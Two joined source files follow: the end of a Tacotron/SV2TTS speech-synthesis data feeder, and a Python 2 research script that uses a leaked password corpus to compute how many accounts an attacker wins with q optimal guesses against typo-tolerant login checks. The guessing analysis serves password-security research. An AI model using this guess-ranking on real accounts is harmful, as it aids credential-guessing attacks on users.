self._target_pad = -hparams.max_abs_value
else:
self._target_pad = 0.
#Mark finished sequences with 1s
self._token_pad = 1.
with tf.device("/cpu:0"):
# Create placeholders for inputs and targets. Don"t specify batch size because we want
# to be able to feed different batch sizes at eval time.
self._placeholders = [
tf.compat.v1.placeholder(tf.int32, shape=(None, None), name="inputs"),
tf.compat.v1.placeholder(tf.int32, shape=(None, ), name="input_lengths"),
tf.compat.v1.placeholder(tf.float32, shape=(None, None, hparams.num_mels),
name="mel_targets"),
tf.compat.v1.placeholder(tf.float32, shape=(None, None), name="token_targets"),
tf.compat.v1.placeholder(tf.int32, shape=(None, ), name="targets_lengths"),
tf.compat.v1.placeholder(tf.int32, shape=(hparams.tacotron_num_gpus, None),
name="split_infos"),
# SV2TTS
tf.compat.v1.placeholder(tf.float32, shape=(None, hparams.speaker_embedding_size),
name="speaker_embeddings")
]
# Create queue for buffering data
queue = tf.queue.FIFOQueue(8, [tf.int32, tf.int32, tf.float32, tf.float32,
tf.int32, tf.int32, tf.float32], name="input_queue")
self._enqueue_op = queue.enqueue(self._placeholders)
self.inputs, self.input_lengths, self.mel_targets, self.token_targets, \
self.targets_lengths, self.split_infos, self.speaker_embeddings = queue.dequeue()
self.inputs.set_shape(self._placeholders[0].shape)
self.input_lengths.set_shape(self._placeholders[1].shape)
self.mel_targets.set_shape(self._placeholders[2].shape)
self.token_targets.set_shape(self._placeholders[3].shape)
self.targets_lengths.set_shape(self._placeholders[4].shape)
self.split_infos.set_shape(self._placeholders[5].shape)
self.speaker_embeddings.set_shape(self._placeholders[6].shape)
# Create eval queue for buffering eval data
eval_queue = tf.queue.FIFOQueue(1, [tf.int32, tf.int32, tf.float32, tf.float32,
tf.int32, tf.int32, tf.float32], name="eval_queue")
self._eval_enqueue_op = eval_queue.enqueue(self._placeholders)
self.eval_inputs, self.eval_input_lengths, self.eval_mel_targets, \
self.eval_token_targets, self.eval_targets_lengths, \
self.eval_split_infos, self.eval_speaker_embeddings = eval_queue.dequeue()
self.eval_inputs.set_shape(self._placeholders[0].shape)
self.eval_input_lengths.set_shape(self._placeholders[1].shape)
self.eval_mel_targets.set_shape(self._placeholders[2].shape)
self.eval_token_targets.set_shape(self._placeholders[3].shape)
self.eval_targets_lengths.set_shape(self._placeholders[4].shape)
self.eval_split_infos.set_shape(self._placeholders[5].shape)
self.eval_speaker_embeddings.set_shape(self._placeholders[6].shape)
def start_threads(self, session):
self._session = session
thread = threading.Thread(name="background", target=self._enqueue_next_train_group)
thread.daemon = True #Thread will close when parent quits
thread.start()
thread = threading.Thread(name="background", target=self._enqueue_next_test_group)
thread.daemon = True #Thread will close when parent quits
thread.start()
def _get_test_groups(self):
meta = self._test_meta[self._test_offset]
self._test_offset += 1
text = meta[5]
input_data = np.asarray(text_to_sequence(text, self._cleaner_names), dtype=np.int32)
mel_target = np.load(os.path.join(self._mel_dir, meta[1]))
#Create parallel sequences containing zeros to represent a non finished sequence
token_target = np.asarray([0.] * (len(mel_target) - 1))
embed_target = np.load(os.path.join(self._embed_dir, meta[2]))
return input_data, mel_target, token_target, embed_target, len(mel_target)
def make_test_batches(self):
start = time.time()
# Read a group of examples
n = self._hparams.tacotron_batch_size
r = self._hparams.outputs_per_step
#Test on entire test set
examples = [self._get_test_groups() for i in range(len(self._test_meta))]
# Bucket examples based on similar output sequence length for efficiency
examples.sort(key=lambda x: x[-1])
batches = [examples[i: i+n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log("\nGenerated %d test batches of size %d in %.3f sec" % (len(batches), n, time.time() - start))
return batches, r
def _enqueue_next_train_group(self):
while not self._coord.should_stop():
start = time.time()
# Read a group of examples
n = self._hparams.tacotron_batch_size
r = self._hparams.outputs_per_step
examples = [self._get_next_example() for i in range(n * _batches_per_group)]
# Bucket examples based on similar output sequence length for efficiency
examples.sort(key=lambda x: x[-1])
batches = [examples[i: i+n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log("\nGenerated {} train batches of size {} in {:.3f} sec".format(len(batches), n, time.time() - start))
for batch in batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch, r)))
self._session.run(self._enqueue_op, feed_dict=feed_dict)
def _enqueue_next_test_group(self):
#Create test batches once and evaluate on them for all test steps
test_batches, r = self.make_test_batches()
while not self._coord.should_stop():
for batch in test_batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch, r)))
self._session.run(self._eval_enqueue_op, feed_dict=feed_dict)
def _get_next_example(self):
"""Gets a single example (input, mel_target, token_target, linear_target, mel_length) from_ disk
"""
if self._train_offset >= len(self._train_meta):
self._train_offset = 0
np.random.shuffle(self._train_meta)
meta = self._train_meta[self._train_offset]
self._train_offset += 1
text = meta[5]
input_data = np.asarray(text_to_sequence(text, self._cleaner_names), dtype=np.int32)
mel_target = np.load(os.path.join(self._mel_dir, meta[1]))
#Create parallel sequences containing zeros to represent a non finished sequence
token_target = np.asarray([0.] * (len(mel_target) - 1))
embed_target = np.load(os.path.join(self._embed_dir, meta[2]))
return input_data, mel_target, token_target, embed_target, len(mel_target)
def _prepare_batch(self, batches, outputs_per_step):
assert 0 == len(batches) % self._hparams.tacotron_num_gpus
size_per_device = int(len(batches) / self._hparams.tacotron_num_gpus)
np.random.shuffle(batches)
inputs = None
mel_targets = None
token_targets = None
targets_lengths = None
split_infos = []
targets_lengths = np.asarray([x[-1] for x in batches], dtype=np.int32) #Used to mask loss
input_lengths = np.asarray([len(x[0]) for x in batches], dtype=np.int32)
for i in range(self._hparams.tacotron_num_gpus):
batch = batches[size_per_device*i:size_per_device*(i+1)]
input_cur_device, input_max_len = self._prepare_inputs([x[0] for x in batch])
inputs = np.concatenate((inputs, input_cur_device), axis=1) if inputs is not None else input_cur_device
mel_target_cur_device, mel_target_max_len = self._prepare_targets([x[1] for x in batch], outputs_per_step)
mel_targets = np.concatenate(( mel_targets, mel_target_cur_device), axis=1) if mel_targets is not None else mel_target_cur_device
#Pad sequences with 1 to infer that the sequence is done
token_target_cur_device, token_target_max_len = self._prepare_token_targets([x[2] for x in batch], outputs_per_step)
token_targets = np.concatenate((token_targets, token_target_cur_device),axis=1) if token_targets is not None else token_target_cur_device
split_infos.append([input_max_len, mel_target_max_len, token_target_max_len])
split_infos = np.asarray(split_infos, dtype=np.int32)
### SV2TTS ###
embed_targets = np.asarray([x[3] for x in batches])
##############
return inputs, input_lengths, mel_targets, token_targets, targets_lengths, \
split_infos, embed_targets
def _prepare_inputs(self, inputs):
max_len = max([len(x) for x in inputs])
return np.stack([self._pad_input(x, max_len) for x in inputs]), max_len
def _prepare_targets(self, targets, alignment):
max_len = max([len(t) for t in targets])
data_len = self._round_up(max_len, alignment)
return np.stack([self._pad_target(t, data_len) for t in targets]), data_len
def _prepare_token_targets(self, targets, alignment):
max_len = max([len(t) for t in targets]) + 1
data_len = self._round_up(max_len, alignment)
return np.stack([self._pad_token_target(t, data_len) for t in targets]), data_len
def _pad_input(self, x, length):
return np.pad(x, (0, length - x.shape[0]), mode="constant", constant_values=self._pad)
def _pad_target(self, t, length):
return np.pad(t, [(0, length - t.shape[0]), (0, 0)], mode="constant", constant_values=self._target_pad)
def _pad_token_target(self, t, length):
return np.pad(t, (0, length - t.shape[0]), mode="constant", constant_values=self._token_pad)
def _round_up(self, x, multiple):
remainder = x % multiple
return x if remainder == 0 else x + multiple - remainder
def _round_down(self, x, multiple):
remainder = x % multiple
return x if remainder == 0 else x - remainder
|
compute_guesses_numpy.py
|
# Compute the security loss of edit 1 correction for q guesses.
# Required: A typo model, or a way to generate the neighborhood of a password
# 1. Create the neighborhood graph of the real password, and then
# 2. Create the ball structure (somehow)
# 3. After having a data structure for balls, and neighbors, computing
# guesses is no brainer.
# Main Challenge: How to store those data structures in disk, and load it.
# What I do right now, create trie of the typos, and a gigantic matrix
# of neigborhood map, this is okay because we decide to have a fixed
# length neighborhood. The balls are some stored some time they are
# just comptued on the fly.
## TODO: Updatable typo trie, so that givea typo trie, we can add more
## item to it.
import string
import sys, os
homedir = os.path.expanduser('~')
sys.path.append('{}/passwords/'.format(homedir))
from readpw import Passwords
# from pwmodel import fast_fuzzysearch, HistPw
from heap import priority_dict
import numpy as np
import os, sys, json
import time
import multiprocessing
from word2keypress import Keyboard
from word2keypress.weighted_edist import sample_typos, get_topk_typos
from zxcvbn import password_strength
import itertools
from multiprocessing import Process
num2sym = dict(zip("`1234567890-=~!@#$%^&*()_+", "~!@#$%^&*()_+`1234567890-="))
MIN_PASS_LEN = 5
KB = Keyboard()
allowed_chars = string.printable[:-5]
MIN_ENTROPY_CUTOFF = 10
REL_ENT_CUTOFF = -3
EDIT_DIST_CUTOFF = 1
MAX_NH_SIZE = 1000
CACHE_SIZE = 10
N = int(1e6) # Number of rockyou password to consider
SPLIT = 10000
Q = 1000
def set_globals(settings_i):
# MIN_ENT, REL_ENT, MAX_NH_SIZE, CACHE_SIZE,
global N, MIN_ENTROPY_CUTOFF, REL_ENT_CUTOFF, MAX_NH_SIZE, CACHE_SIZE, Q
settings = [
(1e4, 10, -3, 10, 5, 1000), # online w/ blacklist
(1e4, 0, 0, 10, 5, 1000), # online w/o blacklist
(1e5, 10, -3, 10, 5, 10000), # offline w/ blacklist
(1e5, 0, 0, 10, 5, 10000), # offline w/o blacklist
]
(N, MIN_ENTROPY_CUTOFF, REL_ENT_CUTOFF, MAX_NH_SIZE, CACHE_SIZE, Q) = settings[settings_i]
return settings[settings_i]
def get_nh(w):
"""
Find the neighborhood of a password w, also enforces the policies.
1. the minimum entropy cutoff
2. the relative entropy cutoff
3. edit distance cutoff, no options, only 1
## HARD CUTOFF of 300 only
"""
ent_w = entropy(w)
ret = ['' for _ in xrange(MAX_NH_SIZE+1)]
ret[0] = w
i = 1
done = set([w])
def filter_(tpw):
if tpw in done: return False
done.add(tpw)
tpw = str(tpw.encode('utf-8', errors='ignore'))
if MIN_ENTROPY_CUTOFF != 0 and REL_ENT_CUTOFF != 0:
ent_tpw = entropy(tpw)
return (ent_tpw>=MIN_ENTROPY_CUTOFF and
(ent_tpw-ent_w)>=REL_ENT_CUTOFF)
else:
return True
for tpw in KB.word_to_typos(str(w)):
if not filter_(tpw): continue
ret[i] = tpw
i += 1
if i>MAX_NH_SIZE:
break
return ret
def entropy(w):
try:
return password_strength(w)['entropy']
except Exception as e:
print (e)
return -1
pwd = os.path.dirname(os.path.abspath(__file__))
from collections import OrderedDict
import marisa_trie
def create_part_pw_nh_graph(args):
pwm, s, e = args
assert e>s
if len(pwm)<s: return
e = min(len(pwm), e)
typodir = '{}/typodir'.format(pwd)
tpw_trie_fname = '{}/{}__{}_{}_typo.trie'.format(typodir, pwm.fbasename, s, e)
rpw_nh_graph = '{}/{}__{}_{}_rpw_nh_graph.npz'.format(typodir, pwm.fbasename, s, e)
if os.path.exists(tpw_trie_fname) and os.path.exists(rpw_nh_graph):
typo_trie = marisa_trie.Trie()
typo_trie.load(tpw_trie_fname)
M = np.load(rpw_nh_graph)['M']
return typo_trie, M
typos = OrderedDict()
k = e-s
M = np.full((k, MAX_NH_SIZE+1), -1, dtype=int)
# typo_f = open('{}/typos.txt', 'a')
def get_typo_id(typo):
try:
return typos[typo]
except KeyError:
# typo_f.write(typo + '\n')
typos[typo] = len(typos)
return typos[typo]
average_nh_size = 0
for i, (pwid, f) in enumerate(pwm):
if i>=e: break
if i<s: continue
rpw = str(pwm.id2pw(pwid).encode('ascii', errors='ignore'))
nh = get_nh(rpw)
# M[i-s, 0] = pwid
average_nh_size += len(nh)
M[i-s, :len(nh)] = np.fromiter((get_typo_id(tpw) for tpw in nh), dtype=int)
if (i>s and i%400==0):
print "Done {} -- len(typos)={}".format(i, len(typos))
if not os.path.exists(typodir):
os.makedirs(typodir)
typo_keys = typos.keys()
typo_trie = marisa_trie.Trie(typo_keys)
for i in xrange(k):
M[i] = np.fromiter(
(typo_trie.key_id(unicode(typo_keys[c])) if c>=0 else -1
for c in M[i]),
dtype=int
)
np.savez_compressed(rpw_nh_graph, M=M)
typo_trie.save(tpw_trie_fname)
print("Average NH size: {}".format(average_nh_size/float(k)))
return
M = None
def _update_M(global_typo_trie, trie_i, tM):
A = np.zeros(len(trie_i))
for k, _id in trie_i.iteritems():
A[_id] = global_typo_trie.key_id(k)
for i in xrange(tM.shape[0]):
tM[i] = A[tM[i]]
return tM
def join_pw_nh_graphs(args):
pwm, split, s, e = args
if s > len(pwm):
return
e = min(e, len(pwm))
typodir = '{}/typodir'.format(pwd)
tpw_trie_fname = '{}/{}__{{}}_{{}}_typo.trie'.format(typodir, pwm.fbasename)
rpw_nh_graph = '{}/{}__{{}}_{{}}_rpw_nh_graph.npz'.format(typodir, pwm.fbasename)
joined_tpw_trie_fname = '{}/{}__{}_{}_typo.trie'\
.format(typodir, pwm.fbasename, s, e)
joined_rpw_nh_graph = '{}/{}__{}_{}_rpw_nh_graph.npz'\
.format(typodir, pwm.fbasename, s, e)
if os.path.exists(joined_rpw_nh_graph) and os.path.exists(joined_tpw_trie_fname):
print(
"{} and {} exits. So returning"\
.format(os.path.basename(joined_tpw_trie_fname),
os.path.basename(joined_tpw_trie_fname))
)
return
tries = []
N = e-s
print("Joining: {}".format(args))
M = np.full((N, MAX_NH_SIZE+1), fill_value=-1, dtype=int)
for i in xrange(0, N, split):
ts, te = i+s, i+s+split
if ts>len(pwm): continue
te = min(te, len(pwm))
typo_trie = marisa_trie.Trie()
typo_trie.load(tpw_trie_fname.format(ts, te))
tries.append(typo_trie)
print("Reading: {}".format(rpw_nh_graph.format(ts, te))),
M[i:i+split] = np.load(rpw_nh_graph.format(ts, te))['M']
print("...Done")
print("Joining trees")
global_typo_trie = marisa_trie.Trie(
k
for tt in tries
for k in tt.iterkeys()
)
print("Number of typos: ", len(global_typo_trie))
args = ((global_typo_trie, tries[i/split], M[i:i+split])
for i in xrange(0, N, split))
# pool = multiprocessing.Pool()
# res = map(_update_M, args)
for i in xrange(0, N, split):
trie_i = tries[i/split]
# M[i:i+split] = _update_M(global_typo_trie, trie_i, M[i:i+split])
M[i:i+split] = _update_M(global_typo_trie, trie_i, M[i:i+split])
# for i in xrange(M.shape[0]):
# if i % split == 0:
# print("Accumulating: {}".format(i))
# trie_i = tries[i/split]
# for j in xrange(M.shape[1]):
# if M[i, j]<0: continue
# M[i, j] = global_typo_trie.key_id(trie_i.restore_key(M[i, j]))
print("Saving all data... {} {}".format(joined_tpw_trie_fname, joined_rpw_nh_graph))
np.savez_compressed(joined_rpw_nh_graph, M=M)
global_typo_trie.save(joined_tpw_trie_fname)
print("Done!")
def create_pw_nh_graph(fname):
pwm = Passwords(fname, max_pass_len=25, min_pass_len=5)
split = SPLIT
# N = 1000
pool = multiprocessing.Pool()
# Create with split 1000
args = [(pwm, i, i+split) for i in xrange(0, N, split)]
pool.map(create_part_pw_nh_graph, args)
print("Done creating all the parts")
# Join 10 at time.
multiplier = 10
if N<1e5:
join_pw_nh_graphs(pwm, split, 0, N)
else:
args1 = [(pwm, split, i, i+split*100) for i in xrange(0, N, split*100)]
pool.map(join_pw_nh_graphs, args1)
join_pw_nh_graphs((pwm, split*100, 0, N))
# while split < N:
# args = [(pwm, split, i, i+split*multiplier)
# for i in xrange(0, N, split*multiplier)]
# pool.map(join_pw_nh_graphs, args)
# split *= multiplier
def read_pw_nh_graph(fname, q=-1, _N=-1):
"""Reads the typo trie file and the neighborhood map created by
`create_pw_nh_graph` function.
Returns: (M, A, typo_trie)
M is the rpw -> Neighborhood information
- M[i][0] is the rpw_id, of i-th most probable password
- M[i][1:] is the neighborhood, truncted to MAX_NH_SIZE (500)
A is the weight of the balls of all the typos we collected
- A[i] = Total sum of frequencies of all the rpw in the ball
of i-th password in trie. (see typo_trie)
typo_trie is a maping from typo_id to typos, so, to retrieve
the i-th typo in A[i], use typo_trie.restore_key(i).
typo_trie is not required for computing the total success of
an attacker.
q: Prune the typo list based on q value, so that don't worry
about typos that are very low in the tail, for example, a
typo with total ball weight < 10*q-th most probable typo, is
most likely useless. Where assume the average ball size is 10.
"""
# N = 1000
global N
if _N>0:
N = _N
typodir = '{}/typodir'.format(pwd)
pwm = Passwords(fname, max_pass_len=25, min_pass_len=5)
N = min(N, len(pwm))
tpw_trie_fname = '{}/{}__{}_{}_typo.trie'\
.format(typodir, pwm.fbasename, 0, N)
rpw_nh_graph = '{}/{}__{}_{}_rpw_nh_graph.npz'\
.format(typodir, pwm.fbasename, 0, N)
typo_trie = marisa_trie.Trie()
typo_trie.load(tpw_trie_fname)
M = np.load(rpw_nh_graph)['M']
## Extra fix ##
M[M==0] = -1
d = len(typo_trie)
A = np.zeros(len(typo_trie))
for i in xrange(M.shape[0]):
if M[i, 0] <=0:
continue
p_rpw = pwm.pw2freq(typo_trie.restore_key(M[i, 0]))
A[M[i, M[i]>=0]] += p_rpw
print("Done creating the 'A' array. Size={}".format(A.shape))
# # Prune the typos, Not all typos are useful, any typo with
# # frequency less than i_th most probable password will never be
# # queried.
# b = (M>0).sum() / float(A.shape[0]) # average ball size
# print("Average ball size: {}".format(b))
# bq_th_pw_f = pwm.id2freq(M[int(b*q)][0])
# useful_typos = (A>=bq_th_pw_f)
# print("Useful typos (> {}): {}/{}".format(
# bq_th_pw_f, useful_typos.sum(), A.shape[0]
# ))
return M, A, typo_trie, pwm
def get_topkcorr_typos(rpw, nh_size):
add_at_end = '1`0/234'
ret = [
rpw.swapcase(), rpw[1].lower()+rpw[1:],
rpw[:-1] + num2sym.get(rpw[-1], rpw[-1]),
rpw[0] + rpw,
]
if len(ret)<=2*nh_size:
ret.extend((rpw + c for c in add_at_end))
ret.extend((c + rpw for c in add_at_end))
if len(ret)<=2*nh_size:
ret.extend((rpw[:-1], rpw[1:]))
ret.extend(
rpw[:i] + rpw[i].swapcase() + rpw[i+1:]
for i in xrange(1, len(rpw))
)
ent_rpw = entropy(rpw)
def filter_(tpw):
ent_tpw = entropy(tpw)
return (ent_tpw>=MIN_ENTROPY_CUTOFF and
(ent_tpw-ent_rpw)>=REL_ENT_CUTOFF)
done = set()
rret = ['' for _ in xrange(nh_size+1)]
rret[0] = rpw; done.add(rpw)
i = 1
for tpw in ret:
if tpw in done: continue
done.add(tpw)
if filter_(tpw):
rret[i] = tpw
i += 1
if i>= nh_size: break
if len(ret)<nh_size+1:
ret.extend(['']*(nh_size+1-len(ret)))
return ret[:nh_size+1]
def get_typodist_nh(rpw, nh_size):
ent_rpw = entropy(rpw)
ret = ['' for _ in range(nh_size+1)]
ret[0] = rpw
done = set([rpw])
i = 1
typos = get_topk_typos(rpw, 2*nh_size)
# assert 0, "Useless process. Run with topk=True"
# typos = sample_typos(rpw, 2*nh_size)
for tpw in typos:
if tpw in done: continue
done.add(tpw)
ent_tpw = entropy(tpw)
if (ent_tpw>=MIN_ENTROPY_CUTOFF and
(ent_tpw-ent_rpw)>=REL_ENT_CUTOFF):
ret[i] = tpw
i += 1
if i>nh_size: break;
return ret
def _get_typos_for_typodist(pwm, q, nh_size, topk):
typos = OrderedDict()
def get_typo_id(_typo):
if not _typo: return -1
try:
return typos[_typo]
except KeyError:
# typo_f.write(typo + '\n')
typos[_typo] = len(typos)
return typos[_typo]
M = np.full((N, nh_size+1), -1, dtype=int)
i = 0
for (pwid, f) in pwm:
if i>=N: break
_a_rpw = pwm.id2pw(pwid)
rpw = str(_a_rpw.encode('ascii', errors='ignore'))
if pwid != pwm.pw2id(rpw):
print("Pwid changed for {!r} -> {!r}".format(_a_rpw, rpw))
continue
# if any(M[:, 0] == pwid):
# print("{!r} is already considered".format(rpw))
# continue
if len(rpw)<MIN_PASS_LEN: continue
if topk:
T = get_topkcorr_typos(rpw, nh_size)
else:
T = get_typodist_nh(rpw, nh_size)
M[i] = [
get_typo_id(tpw) if tpw else -1
for tpw in T
]
if (i>0 and i%1000==0):
print("({}) Processed: {}".format(proc_name, i))
i += 1
# A = A[A>0]
# typo_trie = marisa_trie.Trie(typos.keys())
# assert A.shape[0] == len(typos)
typos = typos.keys()
typo_trie = marisa_trie.Trie(typos)
A = np.zeros(len(typo_trie))
B = [[] for _ in xrange(len(typo_trie))]
for i in xrange(M.shape[0]):
f = pwm.pw2freq(typos[M[i, 0]])
for j in xrange(M.shape[1]):
o = M[i, j]
if o<0: continue
M[i, j] = typo_trie.key_id(unicode(typos[o]))
B[M[i, j]].append(i)
A[M[i, j]] += f
return M, B, A, typo_trie
def _read_typos(pwm, N, proc_name):
typodir = '{}/typodir'.format(pwd)
tpw_trie_fname = '{}/{}__{}_{}_typo.trie'\
.format(typodir, pwm.fbasename, N, proc_name)
rpw_nh_graph = '{}/{}__{}_{}_rpw_nh_graph.npz'\
.format(typodir, pwm.fbasename, N, proc_name)
M = np.load(rpw_nh_graph)['M']
typo_trie = marisa_trie.Trie()
typo_trie.load(tpw_trie_fname)
A = np.zeros(len(typo_trie))
B = [[] for _ in xrange(len(typo_trie))]
for i in xrange(M.shape[0]):
rpw = typo_trie.restore_key(M[i, 0])
f = pwm.pw2freq(rpw)
rpw_ent = entropy(rpw)
assert f>=0, "rpw={}, freq={}".format(rpw, f)
for j in xrange(M.shape[1]):
if M[i,j]<0: continue
tpw = typo_trie.restore_key(M[i,j])
tpw_ent = entropy(tpw)
if (MIN_ENTROPY_CUTOFF>0 and tpw_ent < MIN_ENTROPY_CUTOFF) \
or (REL_ENT_CUTOFF>0 and (tpw_ent-rpw_ent)<REL_ENT_CUTOFF):
if j>0: M[i, j] = -1
continue
if M[i, j]>=0:
B[M[i, j]].append(i)
A[M[i,j]] += f
return M, B, A, typo_trie
def compute_guesses_using_typodist(fname, q, nh_size=5, topk=False, offline=False):
"""
Computes the Neighborhood based on sampling from the typo distribution.
"""
# Re-create the neighborhood, it should be small
global proc_name, N
print(N, MIN_ENTROPY_CUTOFF, REL_ENT_CUTOFF, nh_size)
if topk:
proc_name = "TOPKTypo-{}-{}-{}".format
else:
proc_name = "TYPODIST-{}-{}-{}".format
proc_name = proc_name(MIN_ENTROPY_CUTOFF, REL_ENT_CUTOFF,
('off' if offline else 'on'))
pwm = Passwords(fname, max_pass_len=25, min_pass_len=5)
typodir = '{}/typodir'.format(pwd)
pwm = Passwords(fname, max_pass_len=25, min_pass_len=5)
N = min(N, len(pwm))
tpw_trie_fname = '{}/{}__{}_{}_typo.trie'\
.format(typodir, pwm.fbasename, N, proc_name)
rpw_nh_graph = '{}/{}__{}_{}_rpw_nh_graph.npz'\
.format(typodir, pwm.fbasename, N, proc_name)
if os.path.exists(tpw_trie_fname) and os.path.exists(rpw_nh_graph):
M, B, A, typo_trie = _read_typos(pwm, N, proc_name)
else:
M, B, A, typo_trie = _get_typos_for_typodist(pwm, q, nh_size, topk)
np.savez_compressed(rpw_nh_graph, M=M)
typo_trie.save(tpw_trie_fname)
guesses = []
i = 0
killed = np.ones(M.shape[0], dtype=bool)
while len(guesses)<q:
gi = A.argmax() # tpwid of the i-th guess
# Set of rows where gi exists
killed_gi = B[gi]
killed[killed_gi] = False if not offline else True
e = (typo_trie.restore_key(gi), A[gi]/float(pwm.totalf()))
assert offline or (e not in guesses), "Guesses={}, e={}, killed_gi={}, M[killed_gi]={}"\
.format(guesses, e, gi, M[killed_gi])
if not guesses:
print "gi={}, {} -> {} ({}), "\
.format(gi, e[0], len(B[gi]),
[typo_trie.restore_key(c)
for c in M[killed_gi, 0]])
guesses.append(e)
for ri in killed_gi:
row = M[ri]
f = pwm.pw2freq(typo_trie.restore_key(row[0]))
if f<=0:
print("RPW freq is zero! rpw={}, f={}, guess={}"\
.format(typo_trie.restore_key(row[0]), f, typo_trie.restore_key(gi)))
continue
if offline:
if gi == row[0]:
killed[ri] = False
A[gi] = 0
else:
A[gi] -= f/float(nh_size)
else:
A[row] -= f
print("({}): {}> {:30s}: {:.3e} (killed={}/{})".format(
proc_name,
len(guesses), guesses[-1][0],
guesses[-1][1]*100, len(killed_gi), M.shape[0]-killed.sum()
))
# Sanity check
killed_ids = set(itertools.chain(*[B[typo_trie.key_id(t)] for t, _ in guesses]))
killed_pws_weight = sum(
pwm.pw2freq(typo_trie.restore_key(M[i, 0]))
for i in killed_ids
)
fuzzlambda_q = sum(g[1] for g in guesses)
assert (fuzzlambda_q - killed_pws_weight) < 1e-10, "{} -- {}"\
.format(fuzzlambda_q, killed_pws_weight)
print("({}): Total fuzzy success: {}"\
.format(proc_name, 100*fuzzlambda_q))
print("({}): Total normal success: {}"\
.format(proc_name, 100*pwm.sumvalues(q)/float(pwm.totalf())))
guess_f = 'guesses/{}_guesses_{}_typodist_{}_{}.json'\
.format(pwm.fbasename, q, nh_size, proc_name)
print("Saving the guesses:", guess_f)
with open(guess_f, 'w') as f:
json.dump(guesses, f, indent=4)
def compute_guesses_random(fname, q, k=5):
"""
Goal is to compute the fuzzy success rate given query budget of q.
This time instead of considering 500 points in the neighborhood, we took
random 5 of them, and compute guessing success given that new
neighborhood graph.
"""
global proc_name
proc_name = "RANDOM"
M, A, typo_trie, pwm = read_pw_nh_graph(fname)
guess_f = 'guesses/{}_guesses_{}_random_{}.json'.format(pwm.fbasename, q, k)
A = np.zeros(len(typo_trie))
tM = np.full((M.shape[0], -1, k+1), dtype=int)
for i in xrange(M.shape[0]):
tM[i, 0] = M[i, 0]
if tM[i, 0] == -1:
continue
try:
tM[i, 1:] = np.random.choice(M[i, M[i]>0][1:], k, replace=False)
except ValueError as e:
print("{}: No neighbor for {!r} ({})".format(proc_name, pwm.id2pw(tM[i, 0]), tM[i, 0]))
tM[i, 1:] = np.zeros(k)
p_rpw = pwm.pw2freq(typo_trie.restore_key(M[i, 0]))
A[tM[i, tM[i, :]>=0]] += p_rpw
with open(guess_f, 'w') as f:
json.dump(_comptue_fuzz_success(pwm, tM, A, typo_trie, q), f, indent=4)
def get_trie_key(T, _id):
try:
return T.restore_key(_id)
except KeyError:
return ''
def get_trie_id(T, key):
try:
return T.key_id(unicode(key))
except KeyError:
return -1
proc_name = 'ALL'
def compute_guesses_all(fname, q):
"""We computed neighborhood graph, considering the neighborhood graph
of size 500. Given this neighborhood graph we compute the best set
of guesses in greedy procedure.
"""
M, A, typo_trie, pwm = read_pw_nh_graph(fname)
guess_f = 'guesses/{}_guesses_{}_all.json'.format(pwm.fbasename, q)
with open(guess_f, 'w') as f:
json.dump(_comptue_fuzz_success(pwm, M, A, typo_trie, q), f, indent=4)
def _comptue_fuzz_success(pwm, M, A, typo_trie, q):
"""
pwm: object of type Password (readpw.py)
M: a 2D numpy matrix, containing rpwid|tpwid_1|tpwid_2....
typo_trie: trie of all typos.
A: Of size eualto the size of typo_trie, and contains the
weight of the ball around each typo.
computes the best q guesses using greedy approach.
"""
assert M.shape[0]>2*q, "We don't have enough data to make guesses. "\
"Only {}".format(M.shape[0])
killed = np.ones(M.shape[0], dtype=bool)
guesses = []
i = 0
B = np.zeros(A.shape[0], dtype=int)
print(B.shape, A.shape)
for r in xrange(M.shape[0]):
B[M[r, :]] = r
all_rpw_ent = np.array([
entropy(get_trie_key(typo_trie, c))
for c in M[:,0]
])
while len(guesses)<q:
gi = A.argmax()
# Set of rows where gi exists
r = B[gi]
killed_gi = ((M[:r]==gi).sum(axis=1))>0
## Check for entropy cutoffs
tpw = typo_trie.restore_key(gi)
tpw_ent = entropy(tpw)
if len(tpw)<MIN_PASS_LEN or tpw_ent<MIN_ENTROPY_CUTOFF: # failed
A[gi] = 0
M[:r][M[:r]==gi] = -1
continue
# rpw_ent = (all_rpw_ent[:r] - tpw_ent)<REL_ENT_CUTOFF
failed_entries = (all_rpw_ent[:r]-tpw_ent)<REL_ENT_CUTOFF
print(failed_entries.shape, killed_gi.shape)
if failed_entries[killed_gi].sum()>0:
A[gi] -= sum(
pwm.pw2freq(get_trie_key(typo_trie, c))
for c in M[:r][failed_entries & killed_gi, 0]
)
(M[:r])[M[:r][failed_entries]==gi] = -1
continue
### --
killed[:r][killed_gi] = False
guesses.append((typo_trie.restore_key(gi), A[gi]/float(pwm.totalf())))
for row in M[:r][killed_gi]:
if row[0]>=0:
A[row] -= pwm.pw2freq(get_trie_key(typo_trie, row[0]))
print("({}): {}> {:30s}: {:.3f} (killed={}/{})".format(
proc_name,
len(guesses),
guesses[-1][0],
guesses[-1][1]*100, killed_gi.sum(), M.shape[0]-killed.sum()
))
if (0.99*M.shape[0] > killed.sum()):
M = M[killed]
killed = np.ones(M.shape[0], dtype=bool)
print("({}): New shape of M: {}".format(proc_name, M.shape))
# for i, (g, p) in enumerate(guesses):
# print "{}: {} -> {}".format(i, typo_trie.restore_key(g), p)
print("({}): Total fuzzy success: {}"\
.format(proc_name, 100*sum(g[1] for g in guesses)))
print("({}): Total normal success: {}"\
.format(proc_name, 100*pwm.sumvalues(q)/float(pwm.totalf())))
return guesses
import random
def verify(fname):
pwm = Passwords(fname)
typodir = '{}/typodir'.format(pwd)
tpw_trie_fname = '{}/{}__{}_{}_typo.trie'.format(typodir, pwm.fbasename, 0, N)
rpw_nh_graph = '{}/{}__{}_{}_rpw_nh_graph.npz'.format(typodir, pwm.fbasename, 0, N)
print tpw_trie_fname, rpw_nh_graph
typo_trie = marisa_trie.Trie()
typo_trie.load(tpw_trie_fname)
M = np.load(rpw_nh_graph)['M']
for i, (pwid, f) in enumerate(pwm):
if random.randint(0, 10000)<=1:
continue
if i>=N: break
rpw = str(pwm.id2pw(pwid).encode('ascii', errors='ignore'))
nh = get_nh(rpw)
assert rpw == typo_trie.restore_key(M[i, 0]), \
"{} <--> {}".format(pwm.id2pw(pwid), typo_trie.restore_key(M[i, 0]))
nh_t = [typo_trie.restore_key(c) for c in M[i] if c>=0]
assert nh == nh_t, ">>> i: {}\nNH-NH_t={}\nNH_t-NH={},\nlen(nh)={}"\
.format(i, set(nh)-set(nh_t), set(nh_t)-set(nh), len(nh))
if (i%100==0):
